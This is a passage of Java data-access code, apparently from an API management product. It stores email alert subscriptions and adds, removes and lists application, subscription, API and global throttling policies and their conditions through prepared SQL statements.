* @throws APIManagementException */ public List<Integer> getSavedAlertTypesIdsByUserNameAndStakeHolder(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> list = new ArrayList<Integer>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_TYPES_BY_USERNAME; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getInt(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will retrieve saved emails list by user name and stakeholder. * * @param userName user name. * @param stakeHolder "publisher" , "subscriber" or "admin-dashboard" * @return * @throws APIManagementException */ public List<String> retrieveSavedEmailList(String userName, String stakeHolder) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> list = new ArrayList<String>(); try { String sqlQuery; conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_SAVED_ALERT_EMAILS; ps = conn.prepareStatement(sqlQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); resultSet = ps.executeQuery(); while (resultSet.next()) { list.add(resultSet.getString(1)); } } catch (SQLException e) { handleException("Failed to retrieve saved alert types by user name. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return list; } /** * This method will delete all email alert subscriptions details from tables * * @param userName * @param agent whether its publisher or store or admin dash board. */ public void unSubscribeAlerts(String userName, String agent) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { connection.setAutoCommit(false); String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); ps.executeUpdate(); String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, agent); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); } connection.commit(); } catch (SQLException e) { handleException("Failed to delete alert email data.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * @param userName User name. * @param emailList Comma separated email list. * @param alertTypesIDList Comma separated alert types list. * @param stakeHolder if pram value = p we assume those changes from publisher if param value = s those data belongs to * subscriber. 
* @throws APIManagementException * @throws SQLException */ public void addAlertTypesConfigInfo(String userName, String emailList, String alertTypesIDList, String stakeHolder) throws APIManagementException, SQLException { Connection connection; PreparedStatement ps = null; ResultSet rs = null; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); try { String alertTypesQuery = SQLConstants.ADD_ALERT_TYPES_VALUES; String deleteAlertTypesByUserNameAndStakeHolderQuery = SQLConstants.DELETE_ALERTTYPES_BY_USERNAME_AND_STAKE_HOLDER; ps = connection.prepareStatement(deleteAlertTypesByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.executeUpdate(); if (!StringUtils.isEmpty(alertTypesIDList)) { List<String> alertTypeIdList = Arrays.asList(alertTypesIDList.split(",")); for (String alertTypeId : alertTypeIdList) { PreparedStatement psAlertTypeId = null; try { psAlertTypeId = connection.prepareStatement(alertTypesQuery); psAlertTypeId.setInt(1, Integer.parseInt(alertTypeId)); psAlertTypeId.setString(2, userName); psAlertTypeId.setString(3, stakeHolder); psAlertTypeId.execute(); } catch (SQLException e) { handleException("Error while adding alert types", e); } finally { APIMgtDBUtil.closeAllConnections(psAlertTypeId, null, null); } } } String getEmailListIdByUserNameAndStakeHolderQuery = SQLConstants.GET_EMAILLISTID_BY_USERNAME_AND_STAKEHOLDER; ps = connection.prepareStatement(getEmailListIdByUserNameAndStakeHolderQuery); ps.setString(1, userName); ps.setString(2, stakeHolder); rs = ps.executeQuery(); int emailListId = 0; while (rs.next()) { emailListId = rs.getInt(1); } if (emailListId != 0) { String deleteEmailListDetailsByEmailListId = SQLConstants.DELETE_EMAILLIST_BY_EMAIL_LIST_ID; ps = connection.prepareStatement(deleteEmailListDetailsByEmailListId); ps.setInt(1, emailListId); ps.executeUpdate(); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement extractedEmailListPs = null; try { extractedEmailListPs = connection.prepareStatement(saveEmailListDetailsQuery); extractedEmailListPs.setInt(1, emailListId); extractedEmailListPs.setString(2, email); extractedEmailListPs.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(extractedEmailListPs, null, null); } } } } else { String emailListSaveQuery = SQLConstants.ADD_ALERT_EMAIL_LIST; String dbProductName = connection.getMetaData().getDatabaseProductName(); ps = connection.prepareStatement(emailListSaveQuery, new String[]{DBUtils. 
getConvertedAutoGeneratedColumnName(dbProductName, "EMAIL_LIST_ID")}); ps.setString(1, userName); ps.setString(2, stakeHolder); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int generatedEmailIdList = rs.getInt(1); if (!StringUtils.isEmpty(emailList)) { List<String> extractedEmailList = Arrays.asList(emailList.split(",")); String saveEmailListDetailsQuery = SQLConstants.SAVE_EMAIL_LIST_DETAILS_QUERY; for (String email : extractedEmailList) { PreparedStatement elseExtractedEmailListPS = null; try { elseExtractedEmailListPS = connection.prepareStatement(saveEmailListDetailsQuery); elseExtractedEmailListPS.setInt(1, generatedEmailIdList); elseExtractedEmailListPS.setString(2, email); elseExtractedEmailListPS.execute(); } catch (SQLException e) { handleException("Error while save email list.", e); } finally { APIMgtDBUtil.closeAllConnections(elseExtractedEmailListPS, null, null); } } } } } connection.commit(); } catch (SQLException e) { handleException("Failed to save alert preferences", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } } /** * Add a Application level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_APPLICATION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); if (hasCustomAttrib) { policyStatement.setBlob(12, new ByteArrayInputStream(policy.getCustomAttributes())); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. 
Exception will be thrown later for upper exception log.error("Failed to rollback the add Application Policy: " + policy.toString(), ex); } } handleException("Failed to add Application Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Add a Subscription level throttling policy to database * * @param policy policy object defining the throttle policy * @throws APIManagementException */ public void addSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement policyStatement = null; boolean hasCustomAttrib = false; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { addQuery = SQLConstants.INSERT_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIB_SQL; } policyStatement = conn.prepareStatement(addQuery); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setInt(12, policy.getRateLimitCount()); policyStatement.setString(13, policy.getRateLimitTimeUnit()); policyStatement.setBoolean(14, policy.isStopOnQuotaReach()); policyStatement.setString(15, policy.getBillingPlan()); if (hasCustomAttrib) { policyStatement.setBytes(16, policy.getCustomAttributes()); } policyStatement.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Subscription Policy: " + policy.toString(), ex); } } handleException("Failed to add Subscription Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Wrapper method for {@link #addAPIPolicy(APIPolicy, Connection)} to add * API Policy without managing the database connection manually. * * @param policy policy object to add * @throws APIManagementException */ public APIPolicy addAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to add Api Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } return policy; } /** * Add a API level throttling policy to database. * <p> * If valid policy Id (not -1) is present in the <code>policy</code> object, * policy will be inserted with that policy Id. * Otherwise policy Id will be auto incremented. 
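     * The supplied connection is neither committed nor rolled back here; the calling wrapper owns the transaction.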
* </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void addAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_SQL; int policyId; try { String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.executeUpdate(); resultSet = policyStatement.getGeneratedKeys(); // Get the inserted POLICY_ID (auto incremented value) // Returns only single row if (resultSet.next()) { /* * H2 doesn't return generated keys when key is provided (not generated). Therefore policyId should be policy parameter's policyId when it is provided. */ policyId = resultSet.getInt(1); List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Update a API level throttling policy to database. * <p> * policy will be inserted with that policy Id. * </p> * * @param policy policy object defining the throttle policy * @throws SQLException */ private void updateAPIPolicy(APIPolicy policy, Connection conn) throws SQLException { ResultSet resultSet = null; PreparedStatement policyStatement = null; String addQuery = SQLConstants.ThrottleSQLConstants.INSERT_API_POLICY_WITH_ID_SQL; int policyId = policy.getPolicyId(); try { Statement st = conn.createStatement(); String driverName = conn.getMetaData().getDriverName(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY ON"); } String dbProductName = conn.getMetaData().getDatabaseProductName(); policyStatement = conn.prepareStatement(addQuery, new String[]{DBUtils.getConvertedAutoGeneratedColumnName(dbProductName, "POLICY_ID")}); setCommonParametersForPolicy(policyStatement, policy); policyStatement.setString(12, policy.getUserLevel()); policyStatement.setBoolean(10, true); policyStatement.setInt(13, policyId); int updatedRawCount = policyStatement.executeUpdate(); if (driverName.contains("MS SQL") || driverName.contains("Microsoft")) { st.executeUpdate("SET IDENTITY_INSERT AM_API_THROTTLE_POLICY OFF"); } // Returns only single row if (updatedRawCount > 0) { List<Pipeline> pipelines = policy.getPipelines(); if (pipelines != null) { for (Pipeline pipeline : pipelines) { // add each pipeline data to AM_CONDITION_GROUP table addPipeline(pipeline, policyId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(policyStatement, null, resultSet); } } /** * Add throttling policy pipeline to database * * @param pipeline condition pipeline * @param policyID id of the policy to add pipeline * @param conn database connection. 
This should be provided inorder to rollback transaction * @throws SQLException */ private void addPipeline(Pipeline pipeline, int policyID, Connection conn) throws SQLException { PreparedStatement conditionStatement = null; ResultSet rs = null; try { String sqlAddQuery = SQLConstants.ThrottleSQLConstants.INSERT_CONDITION_GROUP_SQL; List<Condition> conditionList = pipeline.getConditions(); // Add data to the AM_CONDITION table String dbProductName = conn.getMetaData().getDatabaseProductName(); conditionStatement = conn.prepareStatement(sqlAddQuery, new String[]{DBUtils .getConvertedAutoGeneratedColumnName(dbProductName, "CONDITION_GROUP_ID")}); conditionStatement. setInt(1, policyID); conditionStatement.setString(2, pipeline.getQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(pipeline.getQuotaPolicy().getType())) { conditionStatement.setLong(3, ((RequestCountLimit) pipeline.getQuotaPolicy().getLimit()).getRequestCount()); conditionStatement.setString(4, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(pipeline.getQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) pipeline.getQuotaPolicy().getLimit(); conditionStatement.setLong(3, limit.getDataAmount()); conditionStatement.setString(4, limit.getDataUnit()); } conditionStatement.setLong(5, pipeline.getQuotaPolicy().getLimit().getUnitTime()); conditionStatement.setString(6, pipeline.getQuotaPolicy().getLimit().getTimeUnit()); conditionStatement.setString(7, pipeline.getDescription()); conditionStatement.executeUpdate(); rs = conditionStatement.getGeneratedKeys(); // Add Throttling parameters which have multiple entries if (rs != null && rs.next()) { int pipelineId = rs.getInt(1); // Get the inserted // CONDITION_GROUP_ID (auto // incremented value) pipeline.setId(pipelineId); for (Condition condition : conditionList) { if (condition == null) { continue; } String type = condition.getType(); if (PolicyConstants.IP_RANGE_TYPE.equals(type) || PolicyConstants.IP_SPECIFIC_TYPE.equals(type)) { IPCondition ipCondition = (IPCondition) condition; addIPCondition(ipCondition, pipelineId, conn); } if (PolicyConstants.HEADER_TYPE.equals(type)) { addHeaderCondition((HeaderCondition) condition, pipelineId, conn); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(type)) { addQueryParameterCondition((QueryParameterCondition) condition, pipelineId, conn); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(type)) { addJWTClaimsCondition((JWTClaimsCondition) condition, pipelineId, conn); } } } } finally { APIMgtDBUtil.closeAllConnections(conditionStatement, null, rs); } } /** * Add HEADER throttling condition to AM_HEADER_FIELD_CONDITION table * * @param headerCondition {@link HeaderCondition} with header fieled and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. 
This should be provided inorder to rollback transaction * @throws SQLException */ private void addHeaderCondition(HeaderCondition headerCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psHeaderCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_HEADER_FIELD_CONDITION_SQL; psHeaderCondition = conn.prepareStatement(sqlQuery); psHeaderCondition.setInt(1, pipelineId); psHeaderCondition.setString(2, headerCondition.getHeaderName()); psHeaderCondition.setString(3, headerCondition.getValue()); psHeaderCondition.setBoolean(4, headerCondition.isInvertCondition()); psHeaderCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psHeaderCondition, null, null); } } /** * Add QUERY throttling condition to AM_QUERY_PARAMETER_CONDITION table * * @param queryParameterCondition {@link QueryParameterCondition} with parameter name and value * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. This should be provided inorder to rollback transaction * @throws SQLException */ private void addQueryParameterCondition(QueryParameterCondition queryParameterCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement psQueryParameterCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_QUERY_PARAMETER_CONDITION_SQL; psQueryParameterCondition = conn.prepareStatement(sqlQuery); psQueryParameterCondition.setInt(1, pipelineId); psQueryParameterCondition.setString(2, queryParameterCondition.getParameter()); psQueryParameterCondition.setString(3, queryParameterCondition.getValue()); psQueryParameterCondition.setBoolean(4, queryParameterCondition.isInvertCondition()); psQueryParameterCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(psQueryParameterCondition, null, null); } } private void addIPCondition(IPCondition ipCondition, int pipelineId, Connection conn) throws SQLException { PreparedStatement statementIPCondition = null; try { String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_IP_CONDITION_SQL; statementIPCondition = conn.prepareStatement(sqlQuery); String startingIP = ipCondition.getStartingIP(); String endingIP = ipCondition.getEndingIP(); String specificIP = ipCondition.getSpecificIP(); statementIPCondition.setString(1, startingIP); statementIPCondition.setString(2, endingIP); statementIPCondition.setString(3, specificIP); statementIPCondition.setBoolean(4, ipCondition.isInvertCondition()); statementIPCondition.setInt(5, pipelineId); statementIPCondition.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(statementIPCondition, null, null); } } /** * Add JWTCLAIMS throttling condition to AM_JWT_CLAIM_CONDITION table * * @param jwtClaimsCondition {@link JWTClaimsCondition} with claim url and claim attribute * @param pipelineId id of the pipeline which this condition belongs to * @param conn database connection. 
This should be provided in order to roll back the transaction
     * @throws SQLException
     */
    private void addJWTClaimsCondition(JWTClaimsCondition jwtClaimsCondition, int pipelineId, Connection conn)
            throws SQLException {
        PreparedStatement psJWTClaimsCondition = null;
        try {
            String sqlQuery = SQLConstants.ThrottleSQLConstants.INSERT_JWT_CLAIM_CONDITION_SQL;
            psJWTClaimsCondition = conn.prepareStatement(sqlQuery);
            psJWTClaimsCondition.setInt(1, pipelineId);
            psJWTClaimsCondition.setString(2, jwtClaimsCondition.getClaimUrl());
            psJWTClaimsCondition.setString(3, jwtClaimsCondition.getAttribute());
            psJWTClaimsCondition.setBoolean(4, jwtClaimsCondition.isInvertCondition());
            psJWTClaimsCondition.executeUpdate();
        } finally {
            APIMgtDBUtil.closeAllConnections(psJWTClaimsCondition, null, null);
        }
    }

    /**
     * Add a Global level throttling policy to the database
     *
     * @param policy policy object defining the global throttle policy
     * @throws APIManagementException
     */
    public void addGlobalPolicy(GlobalPolicy policy) throws APIManagementException {
        Connection conn = null;
        PreparedStatement policyStatement = null;
        try {
            conn = APIMgtDBUtil.getConnection();
            conn.setAutoCommit(false);
            String addQuery = SQLConstants.INSERT_GLOBAL_POLICY_SQL;
            policyStatement = conn.prepareStatement(addQuery);
            policyStatement.setString(1, policy.getPolicyName());
            policyStatement.setInt(2, policy.getTenantId());
            policyStatement.setString(3, policy.getKeyTemplate());
            policyStatement.setString(4, policy.getDescription());
            InputStream siddhiQueryInputStream;
            byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset());
            int lengthOfBytes = byteArray.length;
            siddhiQueryInputStream = new ByteArrayInputStream(byteArray);
            policyStatement.setBinaryStream(5, siddhiQueryInputStream, lengthOfBytes);
            policyStatement.setBoolean(6, false);
            policyStatement.setString(7, UUID.randomUUID().toString());
            policyStatement.executeUpdate();
            conn.commit();
        } catch (SQLException e) {
            if (conn != null) {
                try {
                    conn.rollback();
                } catch (SQLException ex) {
                    // rollback failed.
exception will be thrown later for upper exception log.error("Failed to rollback the add Global Policy: " + policy.toString(), ex); } } handleException("Failed to add Global Policy: " + policy, e); } finally { APIMgtDBUtil.closeAllConnections(policyStatement, conn, null); } } /** * Retrieves global policy key templates for the given tenantID * * @param tenantID tenant id * @return list of KeyTemplates * @throws APIManagementException */ public List<String> getGlobalPolicyKeyTemplates(int tenantID) throws APIManagementException { List<String> keyTemplates = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATES; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { keyTemplates.add(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATES", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return keyTemplates; } /** * Returns true if the key template exist in DB * * @param policy Global Policy * @return true if key template already exists * @throws APIManagementException */ public boolean isKeyTemplatesExist(GlobalPolicy policy) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; try { conn = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_GLOBAL_POLICY_KEY_TEMPLATE; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, policy.getTenantId()); ps.setString(2, policy.getKeyTemplate()); ps.setString(3, policy.getPolicyName()); rs = ps.executeQuery(); if (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while executing SQL to get GLOBAL_POLICY_KEY_TEMPLATE", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } /** * Removes a throttling policy from the database * * @param policyLevel level of the policy to be deleted * @param policyName name of the policy * @param tenantId used to get the tenant id * @throws APIManagementException */ public void removeThrottlePolicy(String policyLevel, String policyName, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement deleteStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.DELETE_APPLICATION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.DELETE_SUBSCRIPTION_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.DELETE_GLOBAL_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteStatement = connection.prepareStatement(query); deleteStatement.setInt(1, tenantId); deleteStatement.setString(2, policyName); deleteStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Failed to remove policy " + policyLevel + '-' + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteStatement, connection, null); } } /** * Get API level policies. Result only contains basic details of the policy, * it doesn't contain pipeline information. 
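     * <p>
     * A minimal usage sketch (the DAO handle and tenant id are assumed for illustration):
     * <pre>{@code
     * APIPolicy[] apiPolicies = dao.getAPIPolicies(-1234);
     * for (APIPolicy apiPolicy : apiPolicies) {
     *     System.out.println(apiPolicy.getPolicyName());
     * }
     * }</pre>
     * </p>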
* * @param tenantID policies are selected using tenantID * @return APIPolicy ArrayList * @throws APIManagementException */ public APIPolicy[] getAPIPolicies(int tenantID) throws APIManagementException { List<APIPolicy> policies = new ArrayList<APIPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { APIPolicy apiPolicy = new APIPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(apiPolicy, rs); apiPolicy.setUserLevel(rs.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policies.add(apiPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new APIPolicy[policies.size()]); } /** * Get application level polices * * @param tenantID polices are selected only belong to specific tenantID * @return AppilicationPolicy array list */ public ApplicationPolicy[] getApplicationPolicies(int tenantID) throws APIManagementException { List<ApplicationPolicy> policies = new ArrayList<ApplicationPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_APP_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APP_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { ApplicationPolicy appPolicy = new ApplicationPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(appPolicy, rs); policies.add(appPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new ApplicationPolicy[policies.size()]); } /** * Get all subscription level policeis belongs to specific tenant * * @param tenantID tenantID filters the polices belongs to specific tenant * @return subscriptionPolicy array list */ public SubscriptionPolicy[] getSubscriptionPolicies(int tenantID) throws APIManagementException { List<SubscriptionPolicy> policies = new ArrayList<SubscriptionPolicy>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICIES; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { SubscriptionPolicy subPolicy = new SubscriptionPolicy( rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(subPolicy, rs); subPolicy.setRateLimitCount(rs.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); subPolicy.setRateLimitTimeUnit(rs.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); subPolicy.setStopOnQuotaReach(rs.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); subPolicy.setBillingPlan(rs.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); 
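                        // Custom attributes are stored as a binary column; copy them onto the policy only when present.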
                    subPolicy.setCustomAttributes(customAttrib);
                }
                policies.add(subPolicy);
            }
        } catch (SQLException e) {
            handleException("Error while executing SQL", e);
        } catch (IOException e) {
            handleException("Error while converting input stream to byte array", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, rs);
        }
        return policies.toArray(new SubscriptionPolicy[policies.size()]);
    }

    /**
     * Get all Global level policies belonging to a specific tenant
     *
     * @param tenantID tenant id used to filter the policies
     * @return array of global policies defined for the tenant
     * @throws APIManagementException
     */
    public GlobalPolicy[] getGlobalPolicies(int tenantID) throws APIManagementException {
        List<GlobalPolicy> policies = new ArrayList<GlobalPolicy>();
        Connection conn = null;
        PreparedStatement ps = null;
        ResultSet rs = null;
        String sqlQuery = SQLConstants.GET_GLOBAL_POLICIES;
        if (forceCaseInsensitiveComparisons) {
            sqlQuery = SQLConstants.GET_GLOBAL_POLICIES;
        }
        try {
            conn = APIMgtDBUtil.getConnection();
            ps = conn.prepareStatement(sqlQuery);
            ps.setInt(1, tenantID);
            rs = ps.executeQuery();
            while (rs.next()) {
                String siddhiQuery = null;
                GlobalPolicy globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME));
                globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION));
                globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID));
                globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID));
                globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID));
                globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE));
                globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED));
                InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY);
                if (siddhiQueryBlob != null) {
                    siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob);
                }
                globalPolicy.setSiddhiQuery(siddhiQuery);
                policies.add(globalPolicy);
            }
        } catch (SQLException e) {
            handleException("Error while executing SQL", e);
        } finally {
            APIMgtDBUtil.closeAllConnections(ps, conn, rs);
        }
        return policies.toArray(new GlobalPolicy[policies.size()]);
    }

    /**
     * Get a particular Global level policy.
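     * <p>
     * A minimal usage sketch (the DAO handle and policy name are assumed for illustration):
     * <pre>{@code
     * GlobalPolicy customRule = dao.getGlobalPolicy("custom-header-rule");
     * if (customRule != null) {
     *     String siddhiQuery = customRule.getSiddhiQuery();
     * }
     * }</pre>
     * </p>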
